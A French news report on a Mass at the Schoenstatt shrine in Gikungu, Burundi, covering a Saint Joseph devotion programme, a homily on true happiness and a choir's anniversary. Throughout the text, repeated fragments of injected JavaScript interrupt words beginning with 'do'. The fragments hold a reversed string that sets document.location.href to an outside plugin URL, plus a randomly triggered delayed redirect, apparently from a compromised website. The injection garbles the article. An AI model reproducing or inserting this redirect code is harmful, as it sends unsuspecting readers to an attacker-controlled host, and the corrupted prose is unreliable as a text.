La sainte messe du sixième dimanche du temps ordinaire au Sanctuaire Marial de Schoenstatt de Mont Sion Gikungu, animée par la Chorale Saint Martin, a coïncidé avec le troisième dimanche nous préparant à la célébration de la solennité de Saint Joseph prévue le 19 mars 2022, mais aussi la célébration du 20ème anniversaire d’apostolat de la chorale Saint Martin. Les saintes écritures étaient, première lecture Jr 17, 5-8 ; Psaume responsorial Ps1, 1-2.4.6 ; deuxième lecture 1Cor15, 12.16-20 ; et l’évangile Lc 6, 17.20-26.

Le célébrant principal, Père Herménégilde COYITUNGIYE, Recteur du Sanctuaire, dans son mot d’accueil aux pèlerins, a d’abord appelé les chrétiens à se joindre à lui pour féliciter la Chorale Saint Martin pour son anniversaire, et ensemble ils leur ont chanté « Joyeux Anniversaire ». Le Père Herménégilde a ensuite rappelé aux Pèlerins le programme organisé par le sanctuaire Marial de la Paix et la Réconciliation de Mont Sion Gikungu, un programme de 7 semaines pour méditer les 7 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs et 7 joies de Saint Joseph, Père atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doptif de Jésus Christ, et d’implorer son intercession. Ce troisième dimanche correspondait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc à la troisième toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleur et à la troisième joie.  Pourquoi alors les 7 semaines qui nous mèneront jusqu’au 19 mars où on célébrera Saint Joseph l’époux de la Vierge Marie, s’est-il interrogé. Il a rappelé que le Pape François lui a dédié toute une année, pour qu’on puisse l’approcher davantage, étant toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne sa part dans notre rédemption.  Après la Vierge Marie, aucun autre saint n’est plus proche de Jésus comme saint Joseph. Le Pape François l’a surnommé « Parent Brave » qui sait accepter ce qui lui arrive. Dieu l’a choisi, et quand ils manquent l’auberge pour la naissance du Christ, Joseph a transformé une étable dans une maternité. Quand Hérode cherche à faire du mal à l’enfant, Joseph a directement organisé une fuite en Egypte.

Il est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc juste de méditer les 7 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs et les 7 joies, puisque cela ne vient pas de nos fantaisies. On a toujours imploré Saint Joseph, peut-être pas au même niveau que la Vierge Marie. Le Pape François a toujours dit qu’après la Vierge Marie, aucun autre Saint n’a joué un rôle aussi important que Joseph dans notre rédemption. Et le Pape Pie XII l’a consacré comme Patron des travailleurs, et ici dans notre Sanctuaire saint Joseph est vénéré avant tout comme travailleur. Tout cela nous montre que saint Joseph a connu beaucoup de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs qu’il partage avec la Vierge Marie, même s’il est décédé avant la passion du Christ.

Quel est l’origine de la vénération de Saint Joseph? L’Eglise n’a pas directement vénéré Joseph dans les premiers temps peut-être à cause de son silence. Mais plus tard on a compris sa place dans l’Eglise lors des pèlerinages à Jérusalem, Bethlehem et autres lieux saints et en découvrant ses statuts et monuments, montrant ainsi son intimité avec Jésus comme un père. Et commençant par les Moines Dominicains et Franciscains, l’Eglise a commencé à méditer sa place, jusqu’à ce que le Pape déclare le 19 mars journée dédiée à Saint Joseph, protecteur de la Vierge et Père de l’enfant de Dieu. Mais Joseph n’est plus Père de Jésus seulement, mais de tous les enfants que la Vierge Marie a reçus sous la Croix.  Et comme deux Frères Franciscains l’ont témoigné, Joseph serait apparu aux gens et leur aurait révélé les 7 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs, et ceux qui l’implorent en passant par ses toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs reçoivent des grâces.  Que chacun alors médite les 7 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs et joies de Joseph, et leur importance dans notre foi. Il faut que nous nous consacrons à Joseph, particulièrement la Chorale Saint Martin aujourd’hui. Les 7 semaines dédiés aux toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs et joies de saint Joseph seront clôturées par un pèlerinage à Giheta au sanctuaire de Saint Joseph construit par les Frères BeneYozefu. Aujourd’hui nous sommes venus célébrer le vrai bonheur, le bonheur que Joseph a compris de tout son cœur et a saisi, a dit le Père Herménégilde.

Homélie

Dans son homélie axe principalement sur « le vrai bonheur », le Père Recteur COYITUNGIYE a annoncé que Dieu nous a rassemblés sur cette montagne venant des différents coins de Bujumbura et ses environs, comme Jésus l’a fait pour ses disciples, les gens de Jérusalem, de Tire, Sitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don, etc., puisque nous avons soif de rencontrer Dieu, pour lui confier nos soucis et fardeaux. Je serais très étonné si je pouvais savoir ces soucis et ces fardeaux que chacun a dans son cœur et qu’il veut confier à Dieu, a-t-il dit.  Alors mon frère, quelle est cette chose qui pourrait t’apporter la paix dans ton cœur. Que chacun s’assure que cette soif dans son cœur, soit dans la ligne de l’enseignement de Jésus Christ, dans la ligne de la première lecture. Où est-ce que se trouve ton bonheur ? Que chacun se demande où se trouve son bonheur. Où est-ce que tu cherches ton bonheur ?  As-tu besoin de beaucoup d’argent pour être heureux ? Serais-tu heureux si tu chassais ta femme pour épouser une autre ?  Serais-tu heureuse si tu te mariais à cet homme de tes rêves ? Serais-tu heureux si tu te noyais dans les plaisirs de la chair ?  Serais-tu heureux si tu obtenais ton diplôme ?  Serais-tu heureux si tu buvais beaucoup de boissons chères et fortement alcoolisées ? Toi le jeune, serais-tu heureux si tu consommais des drogues ? Homme marié, serais-tu heureux si tu commettais l’adultère puisque tu te sens gêné par ta femme?  Femme, serais-tu heureuse si tu allais passer des nuits avec un certain homme dans un hôtel ? Et toi qui es aujourd’hui dans une position de pouvoir ayant usé de fraudes pour y arriver, es-tu heureux vraiment aujourd’hui?  Quel pouvoir veux-tu pour être heureux : être chef de cellule ou de quartier ? Être administrateur d’une commune ? Être gouverneur ? Être ministre ? Être président de la république ? Avoir assez de pouvoir pour maltraiter qui tu veux ? C’est vrai beaucoup de gens cherchent leur bonheur dans des choses pareilles, mais sont déçus, puisque la satisfaction du cœur se trouve ailleurs, dans le Seigneur, a-t-il fait savoir.

Alors, qui est bienheureux dans ce monde ? c’est celui qui se sent calme même quand il est seul. C’est celui qui est satisfait même dans de petites choses et son bonheur n’est pas exigeant. C’est celui qui vit dans la simplicité.  C’est celui qui n’est pas glouton, qui ne perd pas la tête derrière les choses de ce monde. Sinon ce serait difficile de comprendre les mots de Saint Luc, « Heureux, vous les pauvres, car le royaume de Dieu est à vous. Heureux, vous qui avez faim maintenant, car vous serez rassasiés. Heureux, vous qui pleurez maintenant, car vous rirez ». Lc 6, 20-21.  Cette bonne nouvelle n’est pas facile à comprendre. Ailleurs Jésus nous dit, « Mais quel malheur pour vous, les riches, car vous avez votre consolation. Quel malheur pour vous qui êtes repus maintenant, car vous aurez faim ! Quel malheur pour vous qui riez maintenant, car vous serez dans le deuil et vous pleurerez » Lc 6, 24-25.  Tout cela veut dire que si tu comptes seulement les richesses matérielles et tu mets Dieu de côté, tout est vain. « Maudit soit l’homme qui se confie dans l’homme, Qui prend la chair pour son appui, Et qui détourne son cœur de l’Éternel! » Jr 17, 5. Par contre heureux est l’homme qui se confie dans le Seigneur, « Béni soit l’homme qui se confie dans l’Éternel, Et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont l’Éternel est l’espérance ! » Jr 17, 7. C’est le Seigneur qui étanche toute soif dans nos cœurs. Vous êtes bienheureux, vous qui avez placez votre confiance en Dieu. Vous faites face à la puissance du mal, vous prenez courage à faire ce que tout le monde a peur de faire pour le bien des pauvres, vous prenez soin des pauvres alors que les autres s’enferment dans l’opulence ; vous êtes heureux puisque vous acceptez de vous sacrifier pour les autres, a annoncé Père Herménégilde.

S’adressant aux Choristes, le Recteur a dit que Saint Martin nous montre aussi le vrai bonheur, quand, oubliant son honneur de général de l’armée, il a divisé son uniforme en deux pour habiller un pauvre.  Ainsi pour savoir si quelqu’un a de l’honneur et de respect, regarde comment il reçoit et traite les petites gens, non ceux de son rang. Un vrai homme honorable respecte les pauvres. Si quelqu’un maltraite les petits, il est comme un squelette. Il faut alors suivre l’héritage de Saint Martin, a recommandé le Père Herménégilde.

Le célébrant de messe a terminé son homélie, en rappelant que nous connaissons déjà ces personnes bienheureuses. Elizabeth a été la première à l’annoncer à la Vierge Marie, « Bienheureuse celle qui a cru ». Marie a partagé avec Joseph la troisième toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleur. Quand l’Enfant Jésus a été circoncis et que le sang a été versé, Joseph a souffert de voir le sang de son enfant, mais Joseph a été heureux de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner un nom à l’enfant de Dieu, devenant ainsi son père. C’est cela qui lui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne le bonheur, non pas l’argent, puisqu’il n’était qu’un charpentier. Implorons saint Joseph avec cette troisième toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleur et troisième joie, pour que nous comprenions le vrai bonheur.  Ne nous préoccupons pas des choses matériels de ce monde ce qui est propre aux païens, puisque Dieu Lui-même prend soin de nous, a-t- il conclu.

Alors, comme nous croyons que Jésus Christ est mort et ressuscité, notre bonheur est basé en Lui. C’est Jésus Christ qui nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne la paix dans nos temps. Que ce Christ soit glorifié et loué maintenant et toujours, Amen.

Signalons que le temps de l’offertoire a été pour les choristes une occasion de manifester leur joie en offrant, à côté des oblates de l’autel, une fleur avec l’image de saint Martin ainsi que beaucoup d’autres offrandes en nature.  A la fin de la messe, ils ont effectué une procession vers le sanctuaire où ils ont offert une fleur à la Mère Trois fois Admirable et se sont consacrés à Elle.

Fulgence NDAYIZEYE